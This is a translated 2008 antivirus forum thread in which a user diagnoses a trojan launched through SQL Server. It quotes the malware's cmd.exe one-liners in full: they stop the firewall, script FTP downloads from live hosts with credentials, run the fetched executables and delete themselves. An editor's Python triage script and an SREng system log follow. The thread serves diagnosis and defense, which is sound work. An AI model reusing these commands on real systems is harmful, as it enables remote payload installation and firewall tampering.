Rising Kaka Security Forum
1234567i - 2008-9-2 10:54:00
Recently I keep finding a lot of cmd processes being added automatically. They don't consume much in the way of system resources either, but shortly after I kill one of these processes it gets added again. By tracking and observing them I found that these cmd processes are spawned by the sqlserver process. The cmd processes execute the following two batch command lines:
The first:
"C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess
&echo open 61.160.212.45>dboy.sys
&echo wunai>>dboy.sys
&echo wunai$>>dboy.sys
&echo get ver.exe C:\boots.exe>>dboy.sys
&echo bye>>dboy.sys
&echo ftp -s:dboy.sys>dboy.bat
&echo copy C:\boots.exe C:\WINDOWS\system32\inf\test.exe
&echo start start /high "" C:\WINDOWS\system32\inf\test.exe
&echo start C:\boots.exe>>dboy.bat
&echo start C:\boots.exe>>dboy.bat
&echo del dboy.sys>>dboy.bat
&echo del %0>>dboy.bat&dboy.bat
The second:
"C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess
&echo open ddosboy1.3322.org >dboy1.sys
&echo dboy>>dboy1.sys
&echo if>>dboy1.sys
&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys
&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat
&system1.bat
This is clearly a virus calling dboy.sys through a cmd batch file.
On checking, system32 contains dboy.sys and dboy1.sys, plus a dboy.bat.
The contents of these files are as follows:
The first:
open 218.61.11.180
12369
14789
get wm.exe C:\boots.exe
bye
The second:
open ddosboy1.3322.org
dboy
if
get dboy1.exe C:\Windows\tcpsrv1.exe
bye
The third, the bat file:
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0
Then boots.exe is copied from the root of the C drive to c:\WINDOWS\system32\inf\test.exe,
and then that test.exe is run.
None of the files mentioned in the code above (test.exe, boots.exe, tcpsrv1.exe, system1.bat) were found.
My analysis is that the virus was probably blocked by the antivirus during the copy, so those files were never generated, but the cmd batch processes doing the copying stayed behind in the process list.
That is why I can find traces of them among the processes.
But how do I get rid of these annoying viruses for good? sqlserver certainly can't be removed; that would turn this into a big job. Does anyone have another clever trick? Thanks in advance.
User system info: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1; MAXTHON 2.0)
Frank3160449 - 2008-9-2 11:26:00
So much analysis??? Sounds really serious... but I've had this too. I think it's a trojan cluster??? Or maybe not. Anyway it's quite easy to deal with; I've cleaned it up before. Force-delete with X-delbox and IceSword (冰刃), and also post a log and see for yourself whether your antivirus still works. Also, the reason you can't find those files isn't that the antivirus blocked them: they are installers, and they delete themselves. Run a scan with the Windows Malicious Software Removal Assistant (WINDOWS恶意软件清理助手), and use a force-delete tool on anything it can't kill.
1234567i - 2008-9-2 17:38:00
Thanks for the reply above.
The Rising software is working normally: it runs, and it can detect and remove other viruses. It just can't kill this one.
The few files that can be found can all be deleted; the problem is that as soon as a cmd process starts, they are generated again.
I've observed that the parent process of these cmd processes is sqlserver, so the source of the infection should be this sqlserver. The problem is that I don't want to, and can't, delete sqlserver.
So annoying....
1234567i - 2008-9-2 18:09:00
I think I've worked out how this virus works.
The batch commands that cmd executes actually write the FTP login commands into a *.sys file:
open 203.171.227.191
111
111
get pc.exe C:\tmd.exe
bye
ta
Then it writes the login instructions into a *.bat file:
ftp -s:tencent.sys
start C:\tmd.exe
start C:\tmd.exe
del tencent.sys
del %0
Finally it runs this bat file to log in to its FTP server,
and uploads via the command get pc.exe C:\tmd.exe.
Still researching....
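The two command lines in the first post and the *.sys/*.bat reconstruction in the post above describe the same downloader: a cmd.exe one-liner that stops the firewall service, echoes an ftp.exe script and a launcher .bat to disk, runs the .bat, and has the .bat delete itself. The following Python is an added example by the editor, not code from the thread or from any poster. It replays the echo redirections to rebuild the dropped files, pulls out the FTP host, credentials and drop paths, and flags cmd.exe processes whose parent is sqlservr.exe. The sample command lines are the ones quoted in the first post re-joined on '&'; the process records and their PIDs are constructed, and the remark that a cmd.exe child of sqlservr.exe is how xp_cmdshell execution appears is the editor's assumption about the hand-off, which the thread itself does not establish.

```python
"""Added example: triage the cmd.exe FTP-downloader one-liners quoted in this thread."""
import re
from typing import Dict, List, Tuple

# Constructed sample: the two command lines from the first post, re-joined on '&' the way
# cmd.exe /c receives them (the forum post wrapped the line at every '&').
SAMPLE_CMDLINES = [
    '"C:\\WINDOWS\\system32\\cmd.exe" /c net1 stop sharedaccess'
    '&echo open 61.160.212.45>dboy.sys&echo wunai>>dboy.sys&echo wunai$>>dboy.sys'
    '&echo get ver.exe C:\\boots.exe>>dboy.sys&echo bye>>dboy.sys'
    '&echo ftp -s:dboy.sys>dboy.bat&echo start C:\\boots.exe>>dboy.bat'
    '&echo del dboy.sys>>dboy.bat&echo del %0>>dboy.bat&dboy.bat',
    '"C:\\WINDOWS\\system32\\cmd.exe" /c sc stop sharedaccess'
    '&echo open ddosboy1.3322.org >dboy1.sys&echo dboy>>dboy1.sys&echo if>>dboy1.sys'
    '&echo get dboy1.exe C:\\Windows\\tcpsrv1.exe>>dboy1.sys&echo bye>>dboy1.sys'
    '&echo ftp -s:dboy1.sys>system1.bat&echo start C:\\Windows\\tcpsrv1.exe>>system1.bat'
    '&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat&system1.bat',
]
ECHO_REDIRECT = re.compile(r'^echo\s(.*?)\s*(>>|>)\s*(\S+)$')
# SharedAccess is the Windows XP firewall / Internet Connection Sharing service.
FIREWALL_STOP = re.compile(r'^(?:net1?|sc)\s+stop\s+sharedaccess\b', re.I)

def split_cmd(cmdline: str) -> List[str]:
    """Segments cmd.exe /c runs in order; an unquoted '&' separates them."""
    body = re.split(r'\s/c\s', cmdline, maxsplit=1, flags=re.I)[-1]
    segs, cur, quoted = [], [], False
    for ch in body:
        quoted ^= (ch == '"')
        if ch == '&' and not quoted:
            segs.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    segs.append(''.join(cur).strip())
    return [s for s in segs if s]

def reconstruct_files(cmdline: str) -> Tuple[Dict[str, List[str]], List[str]]:
    """Replay the echo redirections ('>' truncates, '>>' appends): ({file: lines}, other commands)."""
    files: Dict[str, List[str]] = {}
    commands: List[str] = []
    for seg in split_cmd(cmdline):
        m = ECHO_REDIRECT.match(seg)
        if not m:
            commands.append(seg)
            continue
        text, op, target = m.groups()
        if op == '>':
            files[target] = []
        files.setdefault(target, []).append(text)
    return files, commands

def ftp_indicators(script: List[str]) -> dict:
    """Host, credentials and transfers from an 'ftp -s:' script; ftp.exe reads the two lines
    after 'open' as the answers to its user and password prompts."""
    info = {'host': None, 'user': None, 'password': None, 'downloads': []}
    creds: List[str] = []
    for line in script:
        parts = line.split()
        verb = parts[0].lower() if parts else ''
        if verb == 'open' and len(parts) > 1:
            info['host'] = parts[1]
        elif verb == 'get' and len(parts) > 1:       # get <remote> [<local path>]
            info['downloads'].append((parts[1], parts[-1]))
        elif verb == 'bye':
            break
        elif verb and info['host'] and len(creds) < 2:
            creds.append(line)
    info['user'], info['password'] = (creds + [None, None])[:2]
    return info

def triage(cmdline: str) -> dict:
    """Summary of one command line: firewall tampering, FTP IOCs, dropped paths, self-deleting launchers."""
    files, commands = reconstruct_files(cmdline)
    report = {'stops_firewall': any(FIREWALL_STOP.match(c) for c in commands),
              'ftp_scripts': {}, 'dropped_paths': [], 'self_deleting_bats': []}
    for name, lines in files.items():
        for ln in lines:
            script = ln.split(':', 1)[1].strip() if ln.lower().startswith('ftp -s:') else None
            if script in files:
                ioc = ftp_indicators(files[script])
                report['ftp_scripts'][script] = ioc
                report['dropped_paths'] += [local for _, local in ioc['downloads']]
            elif ln.lower() == 'del %0':
                report['self_deleting_bats'].append(name)
    return report

# Constructed process records (pid, ppid, image, command line); PIDs are made up, image paths follow
# the SREng log. A cmd.exe child of sqlservr.exe is what xp_cmdshell execution looks like in a
# process tree (editor's assumption about the hand-off, not something the thread establishes).
SAMPLE_PROCS = [
    (1600, 668, r'C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe', 'sqlservr.exe'),
    (1020, 624, r'C:\WINDOWS\Explorer.EXE', 'explorer.exe'),
    (2244, 1600, r'C:\WINDOWS\system32\cmd.exe', SAMPLE_CMDLINES[0]),
    (2260, 1020, r'C:\WINDOWS\system32\cmd.exe', 'cmd.exe /c dir'),   # benign: spawned by explorer
]

def sqlserver_spawned_downloaders(procs) -> List[int]:
    """PIDs of cmd.exe children of sqlservr.exe whose command line drives ftp.exe with a script."""
    image = {pid: img.lower() for pid, _, img, _ in procs}
    return [pid for pid, ppid, img, cmd in procs
            if image.get(ppid, '').endswith('sqlservr.exe')
            and img.lower().endswith('cmd.exe') and 'ftp -s:' in cmd.lower()]

if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        print(triage(line))
    print('cmd.exe downloaders under sqlservr.exe:', sqlserver_spawned_downloaders(SAMPLE_PROCS))
```

Run it directly to print the triage of both command lines. The output that matters for containment is the host/credential pair and the drop paths, which give something to block at the firewall and to hunt for on disk; the parent-process check turns the poster's observation that the cmd processes come from sqlserver into a repeatable rule over any process list with parent PIDs.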
1234567i - 2008-9-2 18:25:00
The del %0 instruction
is used by the batch file to delete itself.
Frank3160449 - 2008-9-2 20:41:00
Seems like a hassle. I don't know what sqlserver is either (I'm just average, hardly an expert). Check carefully whether the virus has replaced it, or... DLL injection into the process?
Upload a log.... All I know is that this virus deletes the files to clean up its traces, heh
happysunday2003 - 2008-9-2 20:51:00
It's a batch file.
1234567i - 2008-9-2 22:05:00
OK, I'll run a scan and post a log. But I don't really understand SREng.
As in the warning it shows at the top:
API HOOK
Entry point error: CreateProcessA (risk level: high, hooked by the following module: 0x00FF3DA5)
Entry point error: CreateProcessW (risk level: high, hooked by the following module: 0x00FF3E8D)
What does this mean? How should I handle it?
1234567i - 2008-9-2 22:06:00
2008-09-02,22:02:21
System Repair Engineer 2.5.16.900
Smallfrogs (http://www.KZTechs.com)
Windows XP Professional Service Pack 3 (Build 2600) -
The following items were selected:
All startup items (including registry, startup folder, services, etc.)
Browser add-ons
Running processes (including process module information)
File associations
Winsock providers
Autorun.inf
HOSTS file
Process privilege scan
Startup items
Registry
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<ctfmon.exe><C:\WINDOWS\system32\ctfmon.exe> [(Verified)Microsoft Windows Component Publisher]
<DAEMON Tools Lite><"C:\Program Files\DAEMON Tools Lite\daemon.exe" -autorun> [(Verified)DAEMON Tools Code Signing Services]
<H/PC Connection Agent><"C:\Program Files\Microsoft ActiveSync\wcescomm.exe"> [(Verified)Microsoft Corporation]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<HControl><C:\WINDOWS\ATK0100\HControl.exe> [(Verified)Microsoft Windows Component Publisher]
<RavTask><"C:\Program Files\Rising\Rav\RavTask.exe" -system> [(Verified)Beijing Rising Information Technology Corporation Limited]
<NvCplDaemon><RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup> [(Verified)Microsoft Windows Hardware Compatibility Publisher]
<360Safetray><C:\Program Files\360safe\safemon\360tray.exe /start> [(Verified)Microsoft Windows Component Publisher]
<SynTPEnh><C:\Program Files\Synaptics\SynTP\SynTPEnh.exe> [(Verified)Microsoft Windows Hardware Compatibility Publisher]
<360Safebox><"C:\Program Files\360Safebox\safeboxTray.exe" /r> [(Verified)Qizhi Software (beijing) Co. Ltd]
<Wireless Console 2><"C:\Program Files\Wireless Console 2\wcourier.exe"> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
<shell><EXPLORER.EXE> [(Verified)Microsoft Windows Component Publisher]
<UIHost><logonui.exe> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{32CD708B-60A7-4C00-9377-D73EAA495F0F}><C:\WINDOWS\system32\RavExt.dll> [(Verified)Beijing Rising Information Technology Corporation Limited]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad]
<WPDShServiceObj><C:\WINDOWS\system32\WPDShServiceObj.dll> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\OneCard]
<WinlogonNotify: OneCard><C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASWLNPkg.dll> [Cognizance Corporation]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\<{12d0ed0d-0ee0-4f90-8827-78cefb8f4988}]
<IE7 Uninstall Stub><C:\WINDOWS\system32\ieudinit.exe> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
<Outlook Express><%systemroot%\system32\shmgrate.exe OCInstallUserConfigOE> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
<Themes Setup><%SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
<Microsoft Outlook Express 6><"%ProgramFiles%\Outlook Express\setup50.exe" /APP:OE /CALLER:WINNT /user /install> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
<NetMeeting 3.01><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\msnetmtg.inf,NetMtg.Install.PerUser.NT> [(Verified)Microsoft Windows Component Publisher]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]
<Microsoft Windows Media Player><rundll32.exe advpack.dll,LaunchINFSection C:\WINDOWS\INF\wmp11.inf,PerUserStub> [(Verified)DAEMON Tools Code Signing Services]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
<Address Book 6><"%ProgramFiles%\Outlook Express\setup50.exe" /APP:WAB /CALLER:WINNT /user /install> [N/A]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
<N/A><C:\WINDOWS\system32\Rundll32.exe C:\WINDOWS\system32\mscories.dll,Install> [Microsoft Corporation]
==================================
Startup folder
[Bluetooth Manager]
<C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Bluetooth Manager.lnk --> C:\PROGRA~1\Toshiba\BLUETO~1\TOSBTM~1.EXE [TOSHIBA CORPORATION.]><N>
==================================
Services
[Logon Session Broker / ASBroker][Running/Auto Start]
<C:\WINDOWS\System32\svchost.exe -k Cognizance-->C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASWLNPkg.dll><Cognizance Corporation>
[Local Channel / ASChannel][Running/Auto Start]
<C:\WINDOWS\System32\svchost.exe -k Cognizance-->C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\AsChnl.dll><Cognizance Corporation>
[Contrl Center of Storm Media / ccosm][Stopped/Disabled]
<D:\Program Files\多媒体\StormII\stormliv.exe /asservice><北京暴风网际科技有限公司>
[Human Interface Device Access / HidServ][Stopped/Disabled]
<C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\System32\hidserv.dll><N/A>
[lobvir / lobvir][Stopped/Auto Start]
<C:\WINDOWS\system32\svchost.exe -k lobvir-->%SystemRoot%\System32\gedoex.dll><N/A>
[lqqqxd / lqqqxd][Stopped/Auto Start]
<C:\WINDOWS\system32\svchost.exe -k lqqqxd-->%SystemRoot%\System32\gdxecu.dll><N/A>
[Windows Media Center. / McxSvc.][Stopped/Disabled]
<C:\WINDOWS\system32\Slvce1.exe><N/A>
[Windows Media Center.. / McxSvc..][Stopped/Disabled]
<C:\WINDOWS\system32\Slvce2.exe><N/A>
[Windows Media Centerq / McxSvcq][Stopped/Disabled]
<C:\WINDOWS\system32\Slvcexq.exe><N/A>
[MSSQLSERVER / MSSQLSERVER][Running/Auto Start]
<C:\PROGRA~1\MICROS~2\MSSQL\binn\sqlservr.exe><Microsoft Corporation>
[NVIDIA Display Driver Service / NVSvc][Running/Auto Start]
<C:\WINDOWS\system32\nvsvc32.exe><NVIDIA Corporation>
[WinHTTP Proxy Service / ProxySvc][Stopped/Disabled]
<C:\WINDOWS\system32\EsEnt\smss.exe><N/A>
[Rising Proxy Service / RfwProxySrv][Running/Auto Start]
<C:\Program Files\Rising\Rfw\rfwProxy.exe><Beijing Rising Information Technology Co., Ltd.>
[Rising Personal Firewall Service / RfwService][Running/Auto Start]
<C:\Program Files\Rising\Rfw\rfwsrv.exe><Beijing Rising Information Technology Co., Ltd.>
[Rising Process Communication Center / RsCCenter][Running/Auto Start]
<"C:\Program Files\Rising\Rav\CCenter.exe"><Beijing Rising Information Technology Co., Ltd.>
[Rising RealTime Monitor / RsRavMon][Stopped/Auto Start]
<"C:\PROGRAM FILES\RISING\RAV\Ravmond.exe"><Beijing Rising Information Technology Co., Ltd.>
[SQLSERVERAGENT / SQLSERVERAGENT][Running/Auto Start]
<C:\Program Files\Microsoft SQL Server\MSSQL\binn\sqlagent.exe -i MSSQLSERVER><Microsoft Corporation>
[Syntek AVStream USB2.0 WebCam Service / StkSSrv][Stopped/Disabled]
<C:\WINDOWS\System32\StkCSrv.exe><Syntek America Inc.>
[TOSHIBA Bluetooth Service / TOSHIBA Bluetooth Service][Running/Auto Start]
<C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtSrv.exe><TOSHIBA CORPORATION>
==================================
Drivers
[AuthenTec TruePrint USB Driver (SwipeSensor) / ATSWPDRV][Running/Manual Start]
<system32\DRIVERS\ATSwpDrv.sys><AuthenTec, Inc.>
[Microsoft UAA Bus Driver for High Definition Audio / HDAudBus][Running/Manual Start]
<system32\DRIVERS\HDAudBus.sys><Windows (R) Server 2003 DDK provider>
[HookCont / HookCont][Running/System Start]
<\SystemRoot\system32\drivers\HookCont.sys><Beijing Rising Information Technology Co., Ltd.>
[HookNtos / HookNtos][Running/System Start]
<\SystemRoot\system32\drivers\HookNtos.sys><Beijing Rising Information Technology Co., Ltd.>
[HookReg / HookReg][Running/System Start]
<\SystemRoot\system32\drivers\HookReg.sys><Beijing Rising Information Technology Co., Ltd.>
[HookSys / HookSys][Running/System Start]
<\SystemRoot\system32\drivers\HookSys.sys><Beijing Rising Information Technology Co., Ltd.>
[HookUrl / HookUrl][Running/Auto Start]
<\??\C:\Program Files\Rising\Rfw\HookUrl.sys><Beijing Rising Information Technology Co., Ltd.>
[Service for Realtek HD Audio (WDM) / IntcAzAudAddService][Running/Manual Start]
<system32\drivers\RtkHDAud.sys><Realtek Semiconductor Corp.>
[ItSDisk / ItSDisk][Running/System Start]
<System32\Drivers\ItSDisk.sys><Cognizance Corporation>
[ATK0100 ACPI UTILITY / MTsensor][Running/Manual Start]
<system32\DRIVERS\ATKACPI.sys><>
[Intel(R) PRO/Wireless 3945ABG Adapter Driver for Windows XP 32 Bit / NETw3x32][Running/Manual Start]
<system32\DRIVERS\NETw3x32.sys><Intel® Corporation>
[npkcrypt / npkcrypt][Stopped/Auto Start]
<\??\D:\Program Files\网络\qq\npkcrypt.sys><N/A>
[nv / nv][Running/Manual Start]
<system32\DRIVERS\nv4_mini.sys><NVIDIA Corporation>
[Direct Parallel Link Driver / Ptilink][Running/Manual Start]
<system32\DRIVERS\ptilink.sys><Parallel Technologies, Inc.>
[PxHelp20 / PxHelp20][Running/Boot Start]
<\SystemRoot\System32\Drivers\PxHelp20.sys><Sonic Solutions>
[Rising Rfwbase Driver / RfwBase][Running/Auto Start]
<System32\DRIVERS\rfwbase.SYS><Beijing Rising Information Technology Co., Ltd.>
[RsFwDrv / RsFwDrv][Running/System Start]
<\??\C:\Program Files\Rising\Rfw\RsFwDrv.sys><Beijing Rising Information Technology Co., Ltd.>
[RsNTGDI / RsNTGDI][Running/Boot Start]
<\SystemRoot\system32\Drivers\RsNTGdi.sys><Beijing Rising Information Technology Co., Ltd.>
[Realtek 8169 NT Driver / RTL8169][Stopped/Manual Start]
<system32\DRIVERS\Rtlh86.sys><Realtek Corporation>
[Realtek 10/100/1000 PCI-E NIC Family NDIS XP Driver / RTLE8023xp][Running/Manual Start]
<system32\DRIVERS\Rtenicxp.sys><Realtek Semiconductor Corporation>
[SafeBoxKrnl / SafeBoxKrnl][Running/System Start]
<\??\C:\Program Files\360Safebox\SafeBoxKrnl.sys><360安全中心>
[Secdrv / Secdrv][Stopped/Manual Start]
<system32\DRIVERS\secdrv.sys><Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.>
[smserial / smserial][Running/Manual Start]
<system32\DRIVERS\smserial.sys><Motorola Inc.>
[sptd / sptd][Running/Boot Start]
<\SystemRoot\System32\Drivers\sptd.sys><N/A>
[Syntek AVStream USB2.0 1.3M WebCam / StkCMini][Running/Manual Start]
<System32\Drivers\StkCMini.sys><Syntek>
[Synaptics TouchPad Driver / SynTP][Running/Manual Start]
<system32\DRIVERS\SynTP.sys><Synaptics, Inc.>
[Bluetooth COM Port / tosporte][Running/Manual Start]
<system32\DRIVERS\tosporte.sys><TOSHIBA Corporation>
[Bluetooth RFBUS / Tosrfbd][Stopped/Manual Start]
<system32\DRIVERS\tosrfbd.sys><TOSHIBA CORPORATION>
[Bluetooth RFBNEP / tosrfbnp][Stopped/Manual Start]
<System32\Drivers\tosrfbnp.sys><TOSHIBA Corporation>
[Bluetooth RFCOMM / Tosrfcom][Running/System Start]
<System32\Drivers\tosrfcom.sys><TOSHIBA Corporation>
[Bluetooth RFHID / Tosrfhid][Stopped/Manual Start]
<system32\DRIVERS\Tosrfhid.sys><TOSHIBA Corporation.>
[Bluetooth Personal Area Network / tosrfnds][Stopped/Manual Start]
<system32\DRIVERS\tosrfnds.sys><TOSHIBA Corporation.>
[Bluetooth Audio / TosRfSnd][Stopped/Manual Start]
<system32\drivers\tosrfsnd.sys><TOSHIBA Corporation>
[Bluetooth USB Controller / tosrfusb][Stopped/Manual Start]
<system32\DRIVERS\tosrfusb.sys><TOSHIBA CORPORATION>
[World Standard Teletext Codec / WSTCODEC][Stopped/Manual Start]
<system32\DRIVERS\WSTCODEC.SYS><Microsoft Corporation>
1234567i - 2008-9-2 22:06:00
==================================
Browser add-ons
[ThunderAtOnce Class]
{01443AEC-0FD1-40fd-9C87-E93D1494C233} <D:\Program Files\网络\迅雷5\ComDlls\TDAtOnce_Now.dll, Thunder Networking Technologies,LTD>
[Adobe PDF Reader Link Helper]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C5261283} <D:\Program Files\网络\迅雷5\ComDlls\xunleiBHO_Now.dll, Thunder Networking Technologies,LTD>
[SafeMon Class]
{B69F34DD-F0F9-42DC-9EDD-957187DA688D} <C:\Program Files\360safe\safemon\safemon.dll, 360.CN>
[ASUS Security Protect Manager]
{DF21F1DB-80C6-11D3-9483-B03D0EC10000} <C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItIEAddIn.dll, Bioscrypt Inc.>
[Launch Thunder 5]
{09BA8F6D-CB54-424B-839C-C2A6C8E6B436} <D:\Program Files\网络\迅雷5\Thunder.exe, Thunder Networking Technologies,LTD>
[Edit with Altova X&MLSpy]
{2222EF56-F49E-4d07-A14E-8D2B08766958} <, N/A>
[Create Mobile Favorite]
{2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} <C:\PROGRA~1\MICROS~3\INetRepl.dll, Microsoft Corporation>
[Create Mobile Favorite]
{2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} <C:\PROGRA~1\MICROS~3\INetRepl.dll, Microsoft Corporation>
[Research(&R)]
{92780B25-18CC-41C8-B9BE-3C9C571A8263} <C:\PROGRA~1\MI1933~1\OFFICE11\REFIEBAR.DLL, Microsoft Corporation>
[Submit Class]
{A3CD7F74-93C9-4BC4-B892-CCDF1514F714} <C:\WINDOWS\Downloaded Program Files\safeInput4jh.dll, Beijing eChannels Century Technology Co.,Ltd>
[ThunderAtOnce Class]
{01443AEC-0FD1-40FD-9C87-E93D1494C233} <D:\Program Files\网络\迅雷5\ComDlls\TDAtOnce_Now.dll, Thunder Networking Technologies,LTD>
[Adobe PDF Reader Link Helper]
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} <C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll, Adobe Systems Incorporated>
[GerneralPeerID Class]
{0A47E819-F82E-4D5D-B806-6A9EA94D68CD} <D:\Program Files\网络\迅雷5\Components\InMedia\peerid.dll, >
[PeerDraw Class]
{10072CEC-8CC1-11D1-986E-00A0C955B42E} <%CommonProgramFiles%\Microsoft Shared\VGX\vgx.dll, N/A>
[ASUS Security Protect Manager User e-Wallet]
{1009C944-97D5-44A9-9E32-DFF54F498968} <C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ASWallet.dll, Bioscrypt Inc.>
[Windows Media Player]
{22D6F312-B0F6-11D0-94AB-0080C74C7E95} <C:\WINDOWS\system32\wmpdxm.dll, Microsoft Corporation>
[XML DOM Document]
{2933BF90-7B36-11D2-B20E-00C04F983E60} <C:\WINDOWS\system32\msxml3.dll, Microsoft Corporation>
[Thunder Agent Class]
{485463B7-8FB2-4B3B-B29B-8B919B0EACCE} <D:\Program Files\网络\迅雷5\ComDlls\ThunderAgent_Now.dll, Thunder Networking Technologies,LTD>
[HHCtrl Object]
{52A2AAAE-085D-4187-97EA-8C30DB990436} <C:\WINDOWS\system32\hhctrl.ocx, Microsoft Corporation>
[XMP Class]
{6483F145-A768-4C41-AACC-52D4D7845851} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xplayer.dll_1_work, >
[XDRM]
{693571CB-54A3-4E90-9D52-EEAE1334E2D3} <C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\xdrm.dll_1_work, >
[StormPlayer Object]
{6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB} <D:\Program Files\多媒体\StormII\mps.dll, 北京暴风网际科技有限公司>
[Windows Media Player]
{6BF52A52-394A-11D3-B153-00C04F79FAA6} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[MediaComm Class]
{7670648D-461B-42AF-BDFE-46D26AF5EFF2} <D:\Program Files\网络\迅雷5\Components\InMedia\MediaAddin17.dll, Thunder Networking Technologies,LTD>
[360SafeLive]
{87515F61-A66C-4319-A0E0-D416CB8059E3} <C:\Program Files\360safe\live.dll, 360.cn>
[Microsoft Web Browser]
{8856F961-340A-11D0-A96B-00C04FD705A2} <C:\WINDOWS\system32\ieframe.dll, Microsoft Corporation>
[Thunder Browser Helper]
{889D2FEB-5411-4565-8998-1DD2C5261283} <D:\Program Files\网络\迅雷5\ComDlls\xunleiBHO_Now.dll, Thunder Networking Technologies,LTD>
[XML DOM Document 5.0]
{88D969E5-F192-11D4-A65F-0040963251E5} <C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSXML5.DLL, Microsoft Corporation>
[RMGetLicense Class]
{A9FC132B-096D-460B-B7D5-1DB0FAE0C062} <C:\WINDOWS\system32\msnetobj.dll, Microsoft Corporation>
[DapCtrl Class]
{ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8} <C:\Program Files\Common Files\Thunder Network\KanKan\DapCtrl.2.1.5803.60.(267).dll, ShenZhen Thunder Networking Technologies Ltd.>
[SafeMon Class]
{B69F34DD-F0F9-42DC-9EDD-957187DA688D} <C:\Program Files\360safe\safemon\safemon.dll, 360.CN>
[RDS.DataSpace]
{BD96C556-65A3-11D0-983A-00C04FC29E36} <C:\Program Files\Common Files\System\msadc\msadco.dll, Microsoft Corporation>
[QQPlayerSvr Proxy Control]
{CD108273-D434-43E6-AA90-1469F97EB398} <D:\Program Files\网络\QQ\QzoneMusic.dll, 腾讯科技>
[AUDIO__MP3 Moniker Class]
{CD3AFA76-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[AUDIO__WAV Moniker Class]
{CD3AFA7B-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[VIDEO__X_MS_WMV Moniker Class]
{CD3AFA94-B84F-48F0-9393-7EDC34128127} <C:\WINDOWS\system32\wmp.dll, Microsoft Corporation>
[Shockwave Flash Object]
{D27CDB6E-AE6D-11CF-96B8-444553540000} <C:\WINDOWS\system32\Macromed\Flash\Flash9f.ocx, Adobe Systems, Inc.>
[ASUS Security Protect Manager]
{DF21F1DB-80C6-11D3-9483-B03D0EC10000} <C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItIEAddIn.dll, Bioscrypt Inc.>
[XML HTTP Request]
{ED8C108E-4349-11D2-91A4-00C04F7969E8} <C:\WINDOWS\system32\msxml3.dll, Microsoft Corporation>
[Thunder DapPlayer]
